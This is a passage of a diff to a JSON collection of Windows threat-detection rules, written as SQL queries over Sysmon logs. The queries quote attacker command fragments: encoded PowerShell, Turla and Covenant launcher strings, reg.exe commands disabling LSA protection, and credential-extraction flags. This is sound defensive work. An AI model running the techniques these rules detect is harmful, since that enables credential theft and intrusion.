scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target 
Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": 
"proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS 
process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ 
@@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on 
scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": 
"Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - 
"attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine 
LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine 
LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious shell spawned from 
